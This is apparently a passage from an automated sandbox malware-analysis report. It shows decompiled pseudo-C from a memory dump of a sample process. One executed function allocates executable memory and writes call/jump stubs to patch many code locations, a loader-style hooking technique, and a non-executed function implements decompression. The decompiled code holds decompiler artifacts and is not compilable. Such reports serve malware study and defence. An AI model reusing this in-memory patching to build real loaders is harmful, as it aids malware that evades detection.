    				intOrPtr _t214;
    				intOrPtr _t217;
    				intOrPtr* _t223;
    				void** _t232;
    				char* _t234;
    				void* _t243;
    				intOrPtr* _t244;
    
    				_v36 =  &_v21;
    				_v40 = _a4;
    				_v44 =  &_v31;
    				_v48 =  &_v26;
    				_t121 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
    				_t234 =  &_v21;
    				_t168 =  &_v26;
    				_v52 = _t121;
    				_v56 =  &_v31;
    				 *_v52 = 0;
    				_v60 =  *((intOrPtr*)(_v40 + 0x3c));
    				_v64 = 4;
    				_v68 = _v40 + _v60;
    				_t130 =  ==  ? _v68 : 0;
    				_v72 = _v56 + 1;
    				_v76 = _t168 + 1;
    				_v80 = _t234 + 1;
    				_v84 =  &(_v52[1]);
    				_v88 = _t168;
    				_v92 = _v40 -  *((intOrPtr*)(( ==  ? _v68 : 0) + 0x34));
    				_v96 = _v64;
    				_v100 = _t234;
    				_v104 = 0xfffffffb - _v52;
    				_v108 = 0;
    				while(1) {
    					_t191 = _v96;
    					_v112 = _v108;
    					_v116 = _t191;
    					_t143 = _t191 + _v52;
    					 *_v56 = 0xe8;
    					 *_v72 = 0x192194 - _t143;
    					_t173 = _v52;
    					_v120 = _t143;
    					 *((intOrPtr*)(_t173 + _v116)) =  *_v44;
    					_t197 = _v116;
    					 *((char*)(_t173 + _t197 + 4)) =  *((intOrPtr*)(_v44 + 4));
    					_t148 =  *((intOrPtr*)(0x19305c + _v112 * 0xc + 4));
    					_v124 = _t148;
    					_t178 = _t148 + _v40;
    					 *_v88 = 0xe9;
    					_v128 = _v120 + 0xfffffffb - _t178;
    					_v132 = _t197 + 5;
    					 *_v76 = _v128;
    					 *_v100 = 0xe9;
    					 *_v80 = _v104 + 0xfffffffb - _v116 + _t178;
    					_v136 =  *((intOrPtr*)(0x19305c + _v112 * 0xc + 8));
    					_v140 =  *((intOrPtr*)(0x19305c + _v112 * 0xc));
    					_v144 = _v52 + _v132;
    					_v148 = 0;
    					do {
    						_t157 = _v148;
    						 *((char*)(_v144 + _t157)) =  *((intOrPtr*)(_v140 + _t157));
    						_t158 = _t157 + 1;
    						_v148 = _t158;
    					} while (_t158 != _v136);
    					_t244 = _t243 - 0x14;
    					 *_t244 = _v40;
    					_v164 = _v92;
    					_v160 = _v124;
    					_v156 = _v136;
    					_v152 = _v144;
    					E001921AC();
    					_t243 = _t244 + 0x14;
    					_t162 = _v116 + _v136;
    					_t223 = _v36;
    					_t232 = _v84;
    					 *((intOrPtr*)(_t232 + _t162)) =  *_t223;
    					 *((char*)(_t232 + _t162 + 4)) =  *((intOrPtr*)(_t223 + 4));
    					_t164 = _v40;
    					_t214 = _v124;
    					 *((intOrPtr*)(_t164 + _t214)) =  *_v48;
    					 *((char*)(_t164 + _t214 + 4)) =  *((intOrPtr*)(_v48 + 4));
    					_t167 = _v116 + 0xe + _v136;
    					_t217 = _v112 + 1;
    					_v96 = _t167;
    					_v108 = _t217;
    					if(_t217 != 0x160) {
    						continue;
    					}
    					return _t167;
    				}
    			}

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040), ref: 00192428
    Memory Dump Source
    • Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_190000_certcache.jbxd

    Control-flow Graph

    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.232736151.0000000000190000.00000040.sdmp, Offset: 00190000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_190000_certcache.jbxd

    Non-executed Functions

    C-Code - Quality: 50%
    			E001A2E6A(void* __ebx, void* __fp0) {
    				signed int _t1688;
    				signed int _t1692;
    				void* _t2075;
    				signed int _t2086;
    				signed int _t2465;
    				void* _t2870;
    
    				_t2075 = __ebx;
    				 *(_t2870 - 0x1c) = 0xffffffff;
    				 *(_t2870 - 4) =  *(_t2870 + 0xc);
    				 *((intOrPtr*)(_t2870 - 0x18)) =  *(_t2870 + 0xc) +  *( *(_t2870 + 0x10));
    				 *(_t2870 - 0x14) =  *(_t2870 + 0x18);
    				 *((intOrPtr*)(_t2870 - 0x70)) =  *(_t2870 + 0x18) +  *( *(_t2870 + 0x1c));
    				if(( *(_t2870 + 0x20) & 0x00000004) == 0) {
    					 *(_t2870 - 0xf0) =  *(_t2870 + 0x18) -  *((intOrPtr*)(_t2870 + 0x14)) +  *( *(_t2870 + 0x1c)) - 1;
    				} else {
    					 *(_t2870 - 0xf0) = 0xffffffff;
    				}
    				 *(_t2870 - 0x88) =  *(_t2870 - 0xf0);
    				if(( *(_t2870 - 0x88) + 0x00000001 &  *(_t2870 - 0x88)) != 0 ||  *(_t2870 + 0x18) <  *((intOrPtr*)(_t2870 + 0x14))) {
    					 *( *(_t2870 + 0x1c)) = 0;
    					 *( *(_t2870 + 0x10)) = 0;
    					_t1688 = 0xfffffffd;
    				} else {
    					 *(_t2870 - 8) =  *( *(_t2870 + 8) + 4);
    					 *(_t2870 - 0xc) =  *( *(_t2870 + 8) + 0x38);
    					 *(_t2870 - 0x28) =  *( *(_t2870 + 8) + 0x20);
    					 *(_t2870 - 0x10) =  *( *(_t2870 + 8) + 0x24);
    					 *(_t2870 - 0x24) =  *( *(_t2870 + 8) + 0x28);
    					_t1692 =  *( *(_t2870 + 8) + 0x3c);
    					 *(_t2870 - 0x7c) = _t1692;
    					_t2086 =  *(_t2870 + 8);
    					_t2465 =  *_t2086;
    					 *(_t2870 - 0xf8) = _t2465;
    					if( *(_t2870 - 0xf8) <= 0x35) {
    						_t50 =  *(_t2870 - 0xf8) + 0x1a55b0; // 0xcccccc20
    						switch( *((intOrPtr*)(( *_t50 & 0x000000ff) * 4 +  &M001A5528))) {
    							case 0:
    								 *( *(_t2870 + 8) + 0xc) = 0;
    								 *( *(_t2870 + 8) + 8) = 0;
    								 *(_t2870 - 0x24) = 0;
    								 *(_t2870 - 0x10) =  *(_t2870 - 0x24);
    								 *(_t2870 - 0x28) =  *(_t2870 - 0x10);
    								 *(_t2870 - 8) =  *(_t2870 - 0x28);
    								 *(_t2870 - 0xc) =  *(_t2870 - 8);
    								 *( *(_t2870 + 8) + 0x1c) = 1;
    								 *( *(_t2870 + 8) + 0x10) = 1;
    								if(( *(_t2870 + 0x20) & 0x00000001) == 0) {
    									goto L48;
    								} else {
    									goto L9;
    								}
    								goto L600;
    							case 1:
    								if(0 != 0) {
    									L11:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 1;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L10;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L18:
    										L20:
    										if(0 != 0) {
    											L9:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 8) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L20;
    											} else {
    												L10:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 8) = 0;
    													goto L18;
    												} else {
    													goto L11;
    												}
    											}
    										} else {
    											goto L21;
    										}
    									}
    								}
    								goto L600;
    							case 2:
    								if(0 != 0) {
    									L23:
    									 *(_t2870 - 0x1c) = 1;
    									_t2086 =  *(_t2870 + 8);
    									 *_t2086 = 2;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L22;
    									} else {
    										 *( *((intOrPtr*)(__ebp + 8)) + 0xc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										L30:
    										L32:
    										if(0 != 0) {
    											L21:
    											_t2465 =  *(_t2870 - 4);
    											if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
    												 *( *(_t2870 + 8) + 0xc) =  *( *(_t2870 - 4)) & 0x000000ff;
    												 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    												goto L32;
    											} else {
    												L22:
    												_t1692 =  *(_t2870 + 0x20) & 0x00000002;
    												if(_t1692 == 0) {
    													 *( *(_t2870 + 8) + 0xc) = 0;
    													goto L30;
    												} else {
    													goto L23;
    												}
    											}
    										} else {
    											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
    												 *(_t2870 - 0x110) = 1;
    											} else {
    												 *(_t2870 - 0x110) = 0;
    											}
    											_t1692 =  *(_t2870 - 0x110);
    											 *(_t2870 - 0x10) = _t1692;
    											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
    											if(_t2086 == 0) {
    												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    												if(1 > 0x8000) {
    													L42:
    													 *(_t2870 - 0x10c) = 1;
    												} else {
    													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
    													if( *(_t2870 - 0x88) + 1 < 1) {
    														goto L42;
    													} else {
    														 *(_t2870 - 0x10c) = 0;
    													}
    												}
    												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
    												 *(_t2870 - 0x10) = _t2086;
    											}
    											if( *(_t2870 - 0x10) == 0) {
    												goto L48;
    											} else {
    												goto L45;
    											}
    										}
    									}
    								}
    								goto L600;
    							case 3:
    								if(0 != 0) {
    									goto L51;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L50;
    									} else {
    										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L58;
    									}
    								}
    								goto L600;
    							case 4:
    								if(0 != 0) {
    									goto L67;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L66;
    									} else {
    										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L74;
    									}
    								}
    								goto L600;
    							case 5:
    								if(0 != 0) {
    									goto L86;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L85;
    									} else {
    										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L93;
    									}
    								}
    								goto L600;
    							case 6:
    								if(0 != 0) {
    									goto L101;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L100;
    									} else {
    										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L108;
    									}
    								}
    								goto L600;
    							case 7:
    								if(0 != 0) {
    									goto L141;
    								} else {
    									goto L140;
    								}
    								goto L600;
    							case 8:
    								if(0 == 0) {
    								}
    								goto L165;
    							case 9:
    								if(0 != 0) {
    									goto L193;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L192;
    									} else {
    										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L200;
    									}
    								}
    								goto L600;
    							case 0xa:
    								if(0 != 0) {
    									goto L215;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L214;
    									} else {
    										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L222;
    									}
    								}
    								goto L600;
    							case 0xb:
    								if(0 != 0) {
    									goto L293;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L292;
    									} else {
    										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L300;
    									}
    								}
    								goto L600;
    							case 0xc:
    								if(0 == 0) {
    								}
    								goto L318;
    							case 0xd:
    								if(0 != 0) {
    									goto L325;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L324;
    									} else {
    										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L332;
    									}
    								}
    								goto L600;
    							case 0xe:
    								if(0 == 0) {
    								}
    								goto L344;
    							case 0xf:
    								if(0 != 0) {
    									goto L367;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L366;
    									} else {
    										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L374;
    									}
    								}
    								goto L600;
    							case 0x10:
    								if(0 != 0) {
    									goto L390;
    								} else {
    									goto L389;
    								}
    								goto L600;
    							case 0x11:
    								if(0 != 0) {
    									goto L424;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L423;
    									} else {
    										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L431;
    									}
    								}
    								goto L600;
    							case 0x12:
    								if(0 != 0) {
    									goto L454;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L453;
    									} else {
    										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L461;
    									}
    								}
    								goto L600;
    							case 0x13:
    								if(0 != 0) {
    									goto L479;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L478;
    									} else {
    										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L486;
    									}
    								}
    								goto L600;
    							case 0x14:
    								if(0 != 0) {
    									goto L536;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L535;
    									} else {
    										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L543;
    									}
    								}
    								goto L600;
    							case 0x15:
    								if(0 == 0) {
    								}
    								goto L581;
    							case 0x16:
    								if(0 == 0) {
    								}
    								goto L244;
    							case 0x17:
    								if(0 == 0) {
    								}
    								L45:
    								 *(_t2870 - 0x1c) = 0xffffffff;
    								_t2465 =  *(_t2870 + 8);
    								 *_t2465 = 0x24;
    								goto L600;
    							case 0x18:
    								if(0 == 0) {
    								}
    								goto L495;
    							case 0x19:
    								if(0 != 0) {
    									goto L146;
    								} else {
    									goto L144;
    								}
    								goto L600;
    							case 0x1a:
    								if(0 == 0) {
    								}
    								goto L114;
    							case 0x1b:
    								if(0 == 0) {
    								}
    								goto L149;
    							case 0x1c:
    								if(0 != 0) {
    									goto L555;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L554;
    									} else {
    										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L562;
    									}
    								}
    								goto L600;
    							case 0x1d:
    								if(0 != 0) {
    									goto L570;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L569;
    									} else {
    										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L577;
    									}
    								}
    								goto L600;
    							case 0x1e:
    								if(0 != 0) {
    									goto L122;
    								} else {
    									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
    										goto L121;
    									} else {
    										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
    										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
    										goto L129;
    									}
    								}
    								goto L600;
    							case 0x1f:
    								if(0 != 0) {
    									goto L135;
    								} else {
    									goto L134;
    								}
    								goto L600;
    							case 0x20:
    								if(0 != 0) {
    									L504:
    									 *(_t2870 - 0x1c) = 2;
    									_t1692 =  *(_t2870 + 8);
    									 *_t1692 = 0x35;
    								} else {
    									L503:
    									_t2465 =  *(_t2870 - 0x14);
    									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
    										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
    										L502:
    										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
    										_t2086 =  *(_t2870 - 0x10) - 1;
    										 *(_t2870 - 0x10) = _t2086;
    										if( *(_t2870 - 0x118) == 0) {
    											L350:
    											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
    											if(_t1747 < 4) {
    												L352:
    												if( *(_t2870 - 8) >= 0xf) {
    													L381:
    													goto 0x1b0bac;
    													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    													 *(_t2870 - 0x3c) = _t2519;
    													if( *(_t2870 - 0x3c) < 0) {
    														 *(_t2870 - 0x50) = 0xa;
    														do {
    															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
    															_t2519 =  *(_t2870 - 0x50) + 1;
    															 *(_t2870 - 0x50) = _t2519;
    														} while ( *(_t2870 - 0x3c) < 0);
    													} else {
    														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
    														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
    													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
    													 *(_t2870 - 8) = _t1747;
    													_t2086 = 0;
    													if(0 != 0) {
    														goto L352;
    													} else {
    														if( *(_t2870 - 0x10) < 0x100) {
    															L389:
    															_t2465 =  *(_t2870 - 0x14);
    															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
    																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    																_t2086 =  *(_t2870 - 0x14) + 1;
    																 *(_t2870 - 0x14) = _t2086;
    																goto L417;
    															} else {
    																L390:
    																 *(_t2870 - 0x1c) = 2;
    																_t1692 =  *(_t2870 + 8);
    																 *_t1692 = 0x18;
    															}
    														} else {
    															goto L418;
    														}
    													}
    												} else {
    													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
    														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
    														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														goto L381;
    													} else {
    														L354:
    														goto 0x1b0b73;
    														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    														 *(_t2870 - 0x3c) = _t2534;
    														if( *(_t2870 - 0x3c) < 0) {
    															if( *(_t2870 - 8) <= 0xa) {
    																goto L365;
    															} else {
    																 *(_t2870 - 0x50) = 0xa;
    																while(1) {
    																	goto 0x1b0b86;
    																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
    																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
    																	_t2534 =  *(_t2870 - 0x50) + 1;
    																	 *(_t2870 - 0x50) = _t2534;
    																	if( *(_t2870 - 0x3c) >= 0) {
    																		break;
    																	}
    																	_t1747 =  *(_t2870 - 0x50) + 1;
    																	if( *(_t2870 - 8) >= _t1747) {
    																		continue;
    																	}
    																	break;
    																}
    																if( *(_t2870 - 0x3c) < 0) {
    																	goto L365;
    																} else {
    																	goto L378;
    																}
    															}
    														} else {
    															_t1747 =  *(_t2870 - 0x3c) >> 9;
    															 *(_t2870 - 0x50) = _t1747;
    															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
    																L365:
    																_t2086 =  *(_t2870 - 4);
    																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
    																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
    																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
    																	goto L376;
    																} else {
    																	L366:
    																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
    																	if(_t2465 == 0) {
    																		 *(_t2870 - 0xc4) = 0;
    																		L374:
    																		L376:
    																		if(0 != 0) {
    																			goto L365;
    																		} else {
    																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    																			_t1747 =  *(_t2870 - 8) + 8;
    																			 *(_t2870 - 8) = _t1747;
    																			if( *(_t2870 - 8) < 0xf) {
    																				goto L354;
    																			} else {
    																				goto L378;
    																			}
    																		}
    																	} else {
    																		L367:
    																		 *(_t2870 - 0x1c) = 1;
    																		_t1692 =  *(_t2870 + 8);
    																		 *_t1692 = 0x17;
    																	}
    																}
    															} else {
    																L378:
    																goto L381;
    															}
    														}
    													}
    												}
    											} else {
    												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
    												if(_t2086 >= 2) {
    													if( *(_t2870 - 8) < 0xf) {
    														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    														 *(_t2870 - 0xc) = _t1747;
    														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    													}
    													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
    													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
    													if( *(_t2870 - 0x38) < 0) {
    														 *(_t2870 - 0x54) = 0xa;
    														do {
    															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
    															 *(_t2870 - 0x38) = _t2164;
    															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    														} while ( *(_t2870 - 0x38) < 0);
    													} else {
    														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
    													}
    													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
    													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    													 *(_t2870 - 8) = _t1863;
    													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
    														if( *(_t2870 - 8) < 0xf) {
    															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
    															 *(_t2870 - 0xc) = _t1863;
    															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
    															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
    														}
    														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
    														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
    														if( *(_t2870 - 0x38) < 0) {
    															 *(_t2870 - 0x54) = 0xa;
    															do {
    																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
    																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
    																 *(_t2870 - 0x38) = _t2171;
    																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
    															} while ( *(_t2870 - 0x38) < 0);
    														} else {
    															_t1868 =  *(_t2870 - 0x38) >> 9;
    															 *(_t2870 - 0x54) = _t1868;
    														}
    														goto 0x1b0c1e;
    														asm("int3");
    														 *(_t2870 - 0xc) = _t1868 >> _t2171;
    														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
    														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
    														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
    														if(_t1872 == 0) {
    															_t2086 =  *(_t2870 - 0x14);
    															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
    															L417:
    															goto L350;
    														} else {
    															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
    															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
    															goto L418;
    														}
    													} else {
    														L418:
    														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
    														if( *(_t2870 - 0x10) != 0x100) {
    															_t1769 =  *(0x1aac1c +  *(_t2870 - 0x10) * 4);
    															 *(_t2870 - 0x24) = _t1769;
    															_t2180 =  *(_t2870 - 0x10);
    															_t2566 =  *(0x1ab634 + _t2180 * 4);
    															 *(_t2870 - 0x10) = _t2566;
    															if( *(_t2870 - 0x24) == 0) {
    																L437:
    																if( *(_t2870 - 8) >= 0xf) {
    																	L468:
    																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
    																	 *(_t2870 - 0x44) = _t2182;
    																	if( *(_t2870 - 0x44) < 0) {
    																		 *(_t2870 - 0x4c) = 0xa;
    																		do {
    																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
    																			_t2182 =  *(_t2870 - 0x4c) + 1;
    																			 *(_t2870 - 0x4c) = _t2182;
    																		} while ( *(_t2870 - 0x44) < 0);
    																	} else {
    																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
    																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
    																	}
    																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
    																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
    																	 *(_t2870 - 0xc) = _t1769;
    																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
    																	_t2566 = 0;
    																	if(0 != 0) {
    																		goto L437;
    																	} else {
    																		 *(_t2870 - 0x24) =  *(0x1ab0a0 +  *(_t2870 - 0x28) * 4);
    																		_t2592 =  *(_t2870 - 0x28);
    																		_t1789 =  *(0x1ab120 + _t2592 * 4);
    																		 *(_t2870 - 0x28) = _t1789;
    																		if( *(_t2870 - 0x24) == 0) {
    																			L493:
    																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
    																			_t2465 =  *(_t2870 - 0x28);
    																			if(_t2465 <=  *(_t2870 - 0x7c)) {
    																				L498:
    																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
    																				 *(_t2870 - 0x30) = _t2211;
    																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
    																					_t2211 =  *(_t2870 - 0x30);
    																					 *(_t2870 - 0xf4) = _t2211;
    																				} else {
    																					_t1789 =  *(_t2870 - 0x14);
    																					 *(_t2870 - 0xf4) = _t1789;
    																				}
    																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
    																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
    																						L522:
    																						goto L523;
    																					} else {
